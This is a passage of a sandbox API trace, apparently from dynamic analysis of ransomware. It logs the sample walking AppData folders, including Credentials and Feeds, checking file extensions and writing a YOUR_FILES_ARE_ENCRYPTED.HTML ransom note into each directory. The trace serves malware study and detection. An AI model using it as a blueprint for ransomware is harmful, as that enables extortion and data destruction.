(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0170.230] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="A1") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A9") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CC") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="31") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DE") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="24") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="42") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FB") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9D") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F5") returned 2 [0170.230] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A5") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="99") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4B") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="8C") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C6") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F7") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="BF") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="16") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="63") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="34") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2F") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="19") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B3") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AB") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="2E") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="14") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="08") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D8") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="73") returned 2 [0170.231] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="55") returned 2 [0170.232] lstrcpyW (in: lpString1=0x77690bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" [0170.232] CreateIoCompletionPort (FileHandle=0x5fc, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.232] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0170.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0170.232] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned 44 [0170.232] GetProcessHeap () returned 0x270000 [0170.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0170.233] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" [0170.233] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*" [0170.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.240] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa03a7ee, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0170.241] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0170.241] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned 56 [0170.241] GetProcessHeap () returned 0x270000 [0170.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0170.249] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials" [0170.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*" [0170.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.251] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.251] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0170.251] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.251] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0170.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.252] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.258] CloseHandle (hObject=0x5fc) returned 1 [0170.259] GetProcessHeap () returned 0x270000 [0170.259] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.260] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Feeds", cAlternateFileName="")) returned 1 [0170.260] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned 50 [0170.260] GetProcessHeap () returned 0x270000 [0170.260] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.260] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds" [0170.260] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*" [0170.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x60, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0170.263] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0170.263] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.263] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0170.263] lstrlenW (lpString=".feedsdb-ms") returned 11 [0170.263] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0170.263] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0170.263] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 67 [0170.263] GetProcessHeap () returned 0x270000 [0170.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.263] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0170.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*" [0170.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a9bfcdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0170.270] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0170.270] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.270] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0170.270] lstrlenW (lpString=".feed-ms") returned 8 [0170.271] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Work~.feed-ms", cAlternateFileName="MICROS~1.FEE")) returned 1 [0170.271] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 94 [0170.271] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.271] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0170.271] lstrlenW (lpString=".feed-ms") returned 8 [0170.271] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 1 [0170.271] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 87 [0170.271] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.271] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0170.271] lstrlenW (lpString=".feed-ms") returned 8 [0170.271] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0170.271] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 0 [0170.271] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.272] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0170.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.275] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.277] CloseHandle (hObject=0x604) returned 1 [0170.277] GetProcessHeap () returned 0x270000 [0170.278] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.278] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0170.278] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 90 [0170.278] GetProcessHeap () returned 0x270000 [0170.278] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.278] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0170.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*" [0170.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.279] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.279] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0170.279] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 101 [0170.279] GetProcessHeap () returned 0x270000 [0170.279] 